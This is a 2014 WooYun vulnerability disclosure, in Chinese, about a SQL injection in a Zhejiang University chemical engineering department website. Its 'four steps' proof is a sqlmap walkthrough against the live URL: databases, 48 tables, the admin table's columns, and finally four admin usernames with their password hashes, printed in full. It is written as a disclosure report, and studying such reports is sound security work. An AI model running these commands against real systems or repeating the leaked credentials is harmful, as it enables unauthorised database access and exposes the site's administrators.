当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060287

漏洞标题:看我如何"四步"拿下&浙江大学化学工程与生物工程学系数据库

相关厂商:浙江大学

漏洞作者: 从容

提交时间:2014-05-11 11:49

修复时间:2014-06-25 11:50

公开时间:2014-06-25 11:50

漏洞类型:重要敏感信息泄露

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-11: 细节已通知厂商并且等待厂商处理中
2014-05-15: 厂商已经确认,细节仅向厂商公开
2014-05-25: 细节向核心白帽子及相关领域专家公开
2014-06-04: 细节向普通白帽子公开
2014-06-14: 细节向实习白帽子公开
2014-06-25: 细节向公众公开

简要描述:

看我如何"四步"拿下&浙江大学化学工程与生物工程学系数据库
官网:
http://che.zju.edu.cn/

详细说明:

MYSQL注入地址:

http://che.zju.edu.cn/tpe973/topic_detail.php?id=266

漏洞证明:

SQLMAP- -.
#1、获取数据库

./sqlmap.py -u "http://che.zju.edu.cn/tpe973/topic_detail.php?id=266" --dbs


available databases [2]:                                                       
[*] information_schema
[*] tpe973


#2、获取其中一个数据库中的表段:

./sqlmap.py -u "http://che.zju.edu.cn/tpe973/topic_detail.php?id=266" -D tpe973 --tables


[48 tables]
+--------------------+
| hxcms_about |
| hxcms_addlist |
| hxcms_address |
| hxcms_admin |
| hxcms_adv |
| hxcms_allsky |
| hxcms_announce |
| hxcms_applications |
| hxcms_batch |
| hxcms_bodys |
| hxcms_bodytest |
| hxcms_booking |
| hxcms_buy |
| hxcms_buycar_model |
| hxcms_careers |
| hxcms_channel |
| hxcms_class |
| hxcms_classfiy |
| hxcms_coll |
| hxcms_comments |
| hxcms_config |
| hxcms_contact |
| hxcms_dkbuy |
| hxcms_download |
| hxcms_famous |
| hxcms_field |
| hxcms_food |
| hxcms_friends |
| hxcms_honors |
| hxcms_job |
| hxcms_joinline |
| hxcms_liubing |
| hxcms_member |
| hxcms_memup |
| hxcms_myfav |
| hxcms_network |
| hxcms_news |
| hxcms_order |
| hxcms_orderlist |
| hxcms_orders |
| hxcms_product |
| hxcms_questions |
| hxcms_resume |
| hxcms_select |
| hxcms_technical |
| hxcms_travel |
| hxcms_visit |
| hxcms_weblink |
+--------------------+


#3、猜解字段:

./sqlmap.py -u "http://che.zju.edu.cn/tpe973/topic_detail.php?id=266" -D tpe973 -T hxcms_admin --columns


[8 columns]
+---------------+---------------+
| Column | Type |
+---------------+---------------+
| adminclass | varchar(255) |
| adminConfig | varchar(255) |
| adminDate | datetime |
| adminlock | varbinary(20) |
| adminlov | int(11) |
| adminName | varchar(255) |
| adminPassWord | varchar(255) |
| ID | int(11) |
+---------------+---------------+


#4、猜解内容:

+----+-----------+----------------------------------+
| ID | adminName | adminPassWord |
+----+-----------+----------------------------------+
| 1 | admin | 6b9002a9937cb5581b70383623de69bc |
| 9 | login | b13080e10d74049632a4beb3fe611652 |
| 20 | liubing | 84480c7ac532c4a9a6380fc57c08b0fb |
| 19 | buzhiyang | 714389b85a8e41b1cc13db5c68d85157 |
+----+-----------+----------------------------------+


还有很多,就不全展示了- -.

修复方案:

:)

版权声明:转载请注明来源 从容@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2014-05-15 15:47

厂商回复:

已通知相关学校处理

最新状态:

暂无